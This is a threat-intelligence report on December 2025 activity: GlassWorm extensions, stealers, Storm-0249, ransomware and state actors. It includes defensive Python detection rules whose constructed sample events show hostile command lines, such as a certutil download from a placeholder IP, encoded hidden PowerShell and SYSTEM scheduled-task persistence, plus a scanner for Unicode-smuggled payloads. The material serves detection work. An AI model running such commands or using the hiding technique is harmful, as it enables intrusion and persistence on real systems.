Overview
December 2025 demonstrated a clear pivot toward trust-plane exploitation, with both criminal and state-aligned actors favoring legitimate platforms, built-in tooling, and familiar workflows over novel exploits. Campaigns increasingly abuse AI platforms, developer tools, cloud services, endpoint security software, and native operating system utilities to achieve stealthy initial access, credential theft, and durable persistence. Rather than relying on zero-days, adversaries emphasized misconfiguration, user-driven execution, and living-off-the-land techniques, while ransomware and access-broker ecosystems accelerated operations through automation and infrastructure-level targeting. Collectively, activity throughout the month underscored that trust, configuration hygiene, and behavioral visibility now define the effective security boundary more than exploit prevention alone.
Key Trends Identified
- Trust-plane exploitation through legitimate platforms and workflows: Atomic macOS Stealer (AMOS) delivery via AI-poisoned search results and ChatGPT-themed troubleshooting pages, AMOS commands embedded in trusted AI conversations, Calendly-themed AiTM phishing targeting Google Workspace and Facebook Business, Microsoft Teams vishing paired with Quick Assist abuse, and Storm-0249 DLL sideloading inside SentinelOne’s SentinelAgentWorker[.]exe showed attackers systematically abusing trusted brands, security tooling, and support workflows as primary execution paths.
- Developer-ecosystem and tooling compromise at scale: GlassWorm’s multi-wave malicious VS Code and OpenVSX extensions, Piithon-linter proof-of-concept extensions bypassing marketplace review, poisoned extension updates pushed post-approval, credential harvesting from GitHub, npm, and OpenVSX tokens, and the use of Unicode obfuscation and Rust payloads turned IDEs and developer workstations into direct supply-chain intrusion vectors.
- Credential theft and stealer-as-a-service industrialization: SantaStealer’s pre-release MaaS offering, Sryxen’s Chrome App-Bound Encryption bypass via headless DevTools, Phantom Stealer v3.5’s multi-stage .NET injection chain, MacSync Stealer’s notarized Swift dropper, AMOS macOS stealer campaigns, and Telegram-based exfiltration pipelines reinforced credential theft as the dominant access-enablement and monetization strategy.
- Living-off-the-land and security-tool abuse as default post-compromise tradecraft: Velociraptor misuse following ToolShell and WSUS exploitation, Nezha monitoring agent abuse for persistent SYSTEM-level access, extensive use of PowerShell, WMI, certutil, scheduled tasks, and Quick Assist, and Storm-0249 execution inside signed EDR binaries highlighted how attackers increasingly operate entirely within legitimate administrative and security tooling.
- Ransomware evolution toward infrastructure-level and access-broker-driven operations: Hypervisor-focused attacks against ESXi, vCenter, and Hyper-V environments led by Akira, HardBit 4.0’s authorization-gated ransomware with destructive wiper mode, VolkLocker’s rapidly scaled but technically flawed RaaS rollout, and access-broker staging by Storm-0249 reflected continued maturation around efficiency, blast radius, and pre-positioned access.
- Nation-state espionage favoring durable, low-noise access paths: Russian APT44 exploitation of misconfigured network edge devices, PRC-aligned update and DNS abuse, Iranian MuddyWater and Prince of Persia modular tooling evolution, DPRK recruitment-themed malware delivery, and Tomiris’ Telegram- and Discord-based C2 underscored sustained investment in persistence, selective targeting, and public-service infrastructure abuse.
- Mobile, banking, and account-takeover ecosystems expand in capability: Albiriox Android banking MaaS, FvncBot’s real-time VNC-style mobile fraud platform, ClayRat’s Accessibility-driven device takeover, Spiderman phishing kit expansion into banking and crypto fraud, and NFC-enabled relay techniques continue to erode traditional authentication and fraud-prevention controls.
- Edge devices, management planes, and exposed services remain high-value entry points: Ivanti EPM client-side and file-write vulnerabilities, Fortinet FortiCloud SSO signature-bypass flaws, CentreStack exposure targeted by Clop, critical-infrastructure edge compromise, and recurring high-impact CVEs reinforced that internet-exposed management interfaces and security appliances remain priority targets for both state and criminal actors.
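The living-off-the-land and Storm-0249 tradecraft listed above (hidden or encoded PowerShell, ClickFix-style execution from the Run dialog, certutil download and decode, SYSTEM scheduled tasks, WMI process creation, MSI installs from user-writable paths, shells spawned under Quick Assist, and a signed EDR worker binary executing from a user profile) is all visible in process-creation telemetry. The following is an added example, not code from the report or from any vendor: a small rule set run over constructed sample events. The field names (image, parent, cmdline, user), the sample paths, and the heuristic that a copied SentinelAgentWorker.exe under a user-writable directory is a sideloading candidate are assumptions to adapt to your own Sysmon Event ID 1 or EDR process data.

```python
"""Added example (not from the report): behavioural rules for the
living-off-the-land tradecraft summarised above, run over constructed
process-creation events. Field names and paths are assumptions; map them
onto your own Sysmon Event ID 1 / EDR process telemetry."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str    # path of the created process
    parent: str   # path of the parent process
    cmdline: str  # full command line
    user: str     # account the process runs as


def base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# Locations a non-admin user can write to; a security-product binary or an MSI
# running from here is a strong anomaly.
USER_WRITABLE = re.compile(
    r"\\(users\\[^\\]+\\appdata|users\\public|programdata|windows\\temp)\\", re.I)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Signed security-agent binaries named in the text as sideloading hosts;
# extend with your own vendor's worker/helper binaries (assumption).
EDR_BINARIES = {"sentinelagentworker.exe"}


def powershell_encoded_or_hidden(e):
    return base(e.image) in ("powershell.exe", "pwsh.exe") and re.search(
        r"(^|\s)-(e|ec|enc|encodedcommand)\s|-w(indowstyle)?\s+hidden|\biex\b|"
        r"downloadstring|frombase64string", e.cmdline, re.I)

def clickfix_shell_from_explorer(e):
    # ClickFix ends with the user pasting a command into Run, so the shell's
    # parent is explorer.exe and the command carries a URL or encoded payload.
    return base(e.parent) == "explorer.exe" and base(e.image) in SHELLS \
        and re.search(r"https?://|-enc", e.cmdline, re.I)

def certutil_download_or_decode(e):
    return base(e.image) == "certutil.exe" and re.search(
        r"-urlcache|-decode(hex)?\b", e.cmdline, re.I)

def schtasks_system_persistence(e):
    return base(e.image) == "schtasks.exe" and re.search(r"/create\b", e.cmdline, re.I) \
        and re.search(r'/ru\s+"?(nt authority\\)?system', e.cmdline, re.I)

def wmi_remote_process_create(e):
    return base(e.image) == "wmic.exe" and re.search(r"process\s+call\s+create", e.cmdline, re.I)

def msiexec_system_from_user_path(e):
    return base(e.image) == "msiexec.exe" and "system" in e.user.lower() \
        and USER_WRITABLE.search(e.cmdline) is not None

def quick_assist_spawned_shell(e):
    return base(e.parent) == "quickassist.exe" and base(e.image) in SHELLS

def edr_binary_outside_install_dir(e):
    # Sideloading commonly copies the signed binary next to a malicious DLL in a
    # user-writable directory rather than tampering with the vendor install path.
    return base(e.image) in EDR_BINARIES and USER_WRITABLE.search(e.image) is not None


RULES = [powershell_encoded_or_hidden, clickfix_shell_from_explorer,
         certutil_download_or_decode, schtasks_system_persistence,
         wmi_remote_process_create, msiexec_system_from_user_path,
         quick_assist_spawned_shell, edr_binary_outside_install_dir]


def detect(events):
    """Return [(rule_name, event_index), ...] for every rule each event trips."""
    return [(rule.__name__, i) for i, e in enumerate(events) for rule in RULES if rule(e)]


# Constructed sample events (not real telemetry); the last one is benign.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
              "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA", "CORP\\jdoe"),
    ProcEvent(r"C:\Windows\System32\certutil.exe", r"C:\Windows\System32\cmd.exe",
              r"certutil.exe -urlcache -split -f http://203.0.113.7/u.bin C:\Users\jdoe\AppData\Local\Temp\u.bin", "CORP\\jdoe"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe", r"C:\Windows\System32\cmd.exe",
              r"schtasks /create /tn Updater /tr C:\ProgramData\upd.exe /sc onlogon /ru SYSTEM", "CORP\\jdoe"),
    ProcEvent(r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\services.exe",
              r"msiexec.exe /i C:\Users\jdoe\AppData\Local\Temp\svc.msi /qn", "NT AUTHORITY\\SYSTEM"),
    ProcEvent(r"C:\Windows\System32\wbem\wmic.exe", r"C:\Windows\System32\cmd.exe",
              'wmic /node:FS01 process call create "cmd /c whoami"', "CORP\\admin"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Program Files\WindowsApps\QuickAssist\QuickAssist.exe",
              "cmd.exe", "CORP\\jdoe"),
    ProcEvent(r"C:\Users\jdoe\AppData\Roaming\upd\SentinelAgentWorker.exe", r"C:\Windows\System32\msiexec.exe",
              "SentinelAgentWorker.exe", "NT AUTHORITY\\SYSTEM"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\cmd.exe",
              r"powershell.exe -File C:\Scripts\backup.ps1", "CORP\\svc_backup"),
]

if __name__ == "__main__":
    for name, idx in detect(SAMPLE_EVENTS):
        print(f"{name:32s} event[{idx}] {SAMPLE_EVENTS[idx].cmdline[:60]}")
```

Each rule is deliberately narrow so a hit is triageable on its own; the benign backup script in the sample trips nothing. DLL sideloading itself (which DLL the signed worker loaded) needs image-load telemetry rather than process creation, so the rule here keys on the weaker but still useful signal of the vendor binary executing from a path it was never installed to.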
Threat Landscape Overview
The operational pattern across December shows adversaries consolidating around low-friction, high-leverage trust and control planes, including developer tooling, endpoint security software, AI platforms, cloud services, and virtualization layers. Rather than prioritizing novel exploitation, attackers repeatedly achieved access by abusing legitimate workflows and misconfigurations, turning IDE extensions, AI-assisted troubleshooting, remote support utilities, and EDR processes into primary intrusion paths. Campaigns such as GlassWorm’s VS Code and OpenVSX extension waves, AI-poisoned delivery of the Atomic macOS Stealer (AMOS), Storm-0249’s execution inside signed EDR binaries, and large-scale abuse of Quick Assist, Velociraptor, and Nezha illustrate how trusted tooling now provides scalable, low-noise access. In parallel, credential theft operations expanded across Windows, macOS, mobile, and browser ecosystems, with stealer-as-a-service platforms and phishing frameworks feeding access-broker and ransomware workflows while minimizing infrastructure exposure through Telegram- and Discord-based exfiltration.
Ransomware, access brokerage, and espionage activity continued to converge around persistence, speed, and control of infrastructure rather than overt disruption. Ransomware operators increasingly targeted hypervisors, management planes, and backup environments to maximize blast radius, while relying on brokers such as Storm-0249 to deliver pre-staged access that compresses time-to-impact. Nation-state actors mirrored this emphasis on durability, favoring edge-device compromise, update hijacking, public-service command-and-control, and living-off-the-land tradecraft to sustain long-term access with limited visibility. Simultaneously, AI-adjacent risk moved decisively from an emerging concern to operational reality, as attackers embedded malicious activity within trusted AI interactions, misconfigured agent ecosystems, and AI-assisted delivery paths, without exploiting the models themselves. December’s activity reinforces that effective defense now depends less on exploit prevention alone and more on governing trust relationships, identity, tooling, and automation, with behavioral monitoring and configuration discipline becoming central to countering adversaries operating in plain sight.
Industries Targeted
- Cloud, SaaS & DevOps: Shai-Hulud’s self-propagating npm worm, IndonesianFoods registry flooding, malicious npm cloaking activity by dino_reborn, Tsundere’s Node.js botnet leveraging Ethereum-based command-and-control, PyPI and NuGet backdoored packages, prompt injection in GitLab Duo, SSRF in Kibana’s AI Assistant, command execution in CWP, and exploitation of legacy bootstrap scripts and abandoned domains in Python packaging positioned developer and cloud ecosystems as primary intrusion and sabotage vectors.
- Finance, Fintech & Crypto: Sturnus Android banking trojan operations, Fantasy Hub MaaS targeting Russian financial institutions, BankBot-YNRK and DeliveryRAT financial stealers, NGate NFC relay–enabled ATM fraud, macOS spyware harvesting wallet and browser data (Nova Stealer), and DPRK recruitment-themed campaigns targeting AI and cryptocurrency firms underscored sustained pressure on financial platforms and digital asset infrastructure.
- Government & Defense: APT24’s BadAudio supply-chain espionage, PlushDaemon update hijacking campaigns, Operation SkyCloak targeting Russian and Belarusian military units, SpearSpecter operations against senior officials, Ferocious Kitten surveillance of dissident communities, Nevada’s statewide ransomware incident, and the breach of the U.S. Congressional Budget Office highlighted continued targeting of government, defense, and public-sector institutions.
- Manufacturing, Industrial & Critical Infrastructure: PlushDaemon’s SlowStepper backdoor deployed against manufacturers and ICS-adjacent environments, Sharp7Extend NuGet time-bomb packages targeting Siemens PLC workflows, Tsundere’s Node-based botnet across industrial endpoints, and Kraken and Cephalus ransomware operations against virtualized infrastructure supporting OT management emphasized persistent risk to industrial and critical infrastructure operators.
- Telecommunications, Hosting & Internet Infrastructure: The Cloudflare global outage and follow-on analysis, active exploitation of CWP hosting panels, EdgeStepper router implants for update and traffic hijacking, Operation SkyCloak’s Tor-based SSH backdoors, and the Update Health Tools Azure storage hijack demonstrated how compromise or misconfiguration at the infrastructure and routing layer can cascade into widespread service disruption.
Most Active Threat Actors
- APT44 (Russia-aligned): Long-running critical-infrastructure targeting via misconfigured network edge devices, packet capture and credential replay at the perimeter, and sustained access to energy, telecom, and cloud-adjacent environments without reliance on zero-day exploitation.
- Storm-2603 (tracked separately from APT44; Microsoft assesses it with medium confidence as China-based): ToolShell-enabled post-exploitation and Velociraptor abuse for SYSTEM-level persistence, the DFIR-tool misuse noted under Key Trends.
- Storm-0249 (financially motivated): Precision initial-access operations abusing ClickFix social engineering, fileless PowerShell delivery, DLL sideloading into signed EDR processes (SentinelAgentWorker[.]exe), SYSTEM-level MSI persistence, and brokered access handoff to ransomware affiliates.
- GlassWorm (financially motivated): Multi-wave malicious VS Code and OpenVSX extension campaigns using Unicode obfuscation, post-approval update poisoning, Rust payloads, credential harvesting from GitHub, npm, and cloud tokens, and SOCKS/HVNC deployment on developer workstations.
- Akira (financially motivated): Accelerated ransomware campaigns targeting ESXi, vCenter, and Hyper-V management planes, exploiting weak segmentation and identity misconfigurations to achieve mass encryption and infrastructure-level impact.
- CyberVolk / VolkLocker (Russia-nexus): Reemergence with Golang-based ransomware-as-a-service featuring Telegram-driven automation, affiliate onboarding, cross-platform payloads, and operational weaknesses caused by hardcoded encryption material and minimal obfuscation.
- BlackForce (financially motivated): Mature phishing-as-a-service operations leveraging React-based frontends, real-time Man-in-the-Browser MFA relay, mobile-only targeting, ISP and crawler filtering, and stateful backend credential handling to enable full account takeover.
- REF7707 / NANOREMOTE operators (espionage-motivated): Deployment of modular Windows backdoors abusing Google Drive APIs for encrypted command-and-control, resumable file transfer, in-memory execution, and long-term post-exploitation tasking.
- Spiderman Toolkit operators (financially motivated): Large-scale European banking and crypto fraud via fully automated phishing kits supporting real-time credential, OTP, and PhotoTAN capture, identity packet harvesting, and cross-border financial targeting.
- Albiriox, FvncBot, and ClayRat operators (financially motivated): Accessibility-abuse-driven mobile malware enabling full device takeover, VNC-style remote control, screen streaming, NFC relay fraud, and scalable account takeover across banking and fintech applications.
- MuddyWater (Iran-aligned): Targeted espionage using new loaders and backdoors with reflective loading, Windows CNG cryptography, modular tasking, and long-term access against government, academic, and critical-infrastructure entities.
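The Unicode obfuscation attributed to GlassWorm under Key Trends and in the actor entry above works because certain code points render as nothing in an editor or diff view yet survive review and execution. The following is an added example, not GlassWorm’s code or any marketplace or vendor scanner: it flags invisible and bidirectional-control characters in extension source and, as a second step, recovers bytes hidden with one published variation-selector scheme (U+FE00..U+FE0F carry 0..15 and U+E0100..U+E01EF carry 16..255). The sample module and the hidden string are constructed for the example, and the byte mapping is an assumption about the encoder rather than something the report states.

```python
"""Added example (not GlassWorm's code or any vendor tool): scan extension
source for invisible and bidirectional-control code points, and recover
bytes smuggled with one published variation-selector scheme. The sample
source and hidden string are constructed; the VS byte mapping is an
assumption about the encoder, not something the report states."""
import unicodedata

VS_LOW = range(0xFE00, 0xFE10)      # U+FE00..U+FE0F   -> byte values 0..15
VS_HIGH = range(0xE0100, 0xE01F0)   # U+E0100..U+E01EF -> byte values 16..255
BOM = 0xFEFF


def is_invisible(ch: str) -> bool:
    """True for characters that render as nothing or reorder text in an editor."""
    if ch in "\t\n\r":
        return False
    cp = ord(ch)
    # Cf: zero-width joiners/spaces, bidi overrides, tag characters, BOM.
    # Cc: remaining control characters. Variation selectors are category Mn,
    # so they are range-checked explicitly.
    return unicodedata.category(ch) in ("Cf", "Cc") or cp in VS_LOW or cp in VS_HIGH


def scan_source(text: str):
    """Return (line, column, codepoint, name) for every suspicious character.
    A single BOM at the very start of the file is tolerated."""
    findings = []
    for ln, line in enumerate(text.split("\n"), 1):
        for col, ch in enumerate(line, 1):
            if ln == 1 and col == 1 and ord(ch) == BOM:
                continue
            if is_invisible(ch):
                findings.append((ln, col, ord(ch), unicodedata.name(ch, "<unnamed>")))
    return findings


def decode_variation_selectors(text: str) -> bytes:
    """Extract bytes hidden as variation selectors, ignoring all visible text."""
    out = bytearray()
    for ch in text:
        cp = ord(ch)
        if cp in VS_LOW:
            out.append(cp - 0xFE00)
        elif cp in VS_HIGH:
            out.append(cp - 0xE0100 + 16)
    return bytes(out)


def encode_variation_selectors(data: bytes) -> str:
    """Inverse of the decoder; used here only to build the constructed sample."""
    return "".join(chr(0xFE00 + b) if b < 16 else chr(0xE0100 + b - 16) for b in data)


# Constructed sample: an innocuous-looking extension module with a zero-width
# space in a comment, a hidden byte string glued to a statement, and a bidi override.
HIDDEN = b"hidden payload marker"
SAMPLE_JS = (
    "const version = '1.2.3';\n"
    "// telemetry helper\u200b\n"
    "function ping(u) { return fetch(u); }\n"
    "const x = 'ok';" + encode_variation_selectors(HIDDEN) + "\n"
    "module.exports = { ping }; // \u202e\n"
)

if __name__ == "__main__":
    for ln, col, cp, name in scan_source(SAMPLE_JS):
        print(f"line {ln} col {col}: U+{cp:04X} {name}")
    print("recovered:", decode_variation_selectors(SAMPLE_JS))
```

Run the scanner over every .js and .ts file in an extension’s packaged VSIX or an OpenVSX download before installing it; a single long run of variation selectors on one line is the signature to look for, and the decoder then tells you whether those characters carry a byte stream rather than legitimate glyph selection. Any finding outside a string literal that is genuinely meant to hold such characters should block the install.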
Hunter Insights
Adversaries are likely to deepen their focus on trust-plane abuse in 2026, expanding campaigns that weaponize AI assistants, IDE extensions, endpoint security tools, remote support utilities, and cloud management planes as primary intrusion paths rather than relying on novel exploits. Expect more self-propagating supply-chain attacks like GlassWorm against developer ecosystems, industrialized stealer-as-a-service offerings that harvest multi-platform credentials at scale, and routine post-compromise use of DFIR and EDR tooling (for example, Velociraptor-style misuse) to blend command-and-control into legitimate administrative activity while compressing time from access to monetization or impact.
Looking ahead, ransomware, access brokers, and nation-state operators will continue converging on infrastructure-level objectives—hypervisors, edge devices, update channels, and public-service platforms—where control of identity, configuration, and automation yields maximum blast radius with minimal visibility. Financial, cloud/DevOps, and mobile-banking ecosystems should anticipate more MaaS-style mobile RATs, NFC relay fraud, and CI/CD poisoning. At the same time, governments and critical infrastructure operators face persistent APT44- and MuddyWater-style campaigns that exploit misconfiguration and living-off-the-land tradecraft to maintain durable footholds for both espionage and contingency disruption.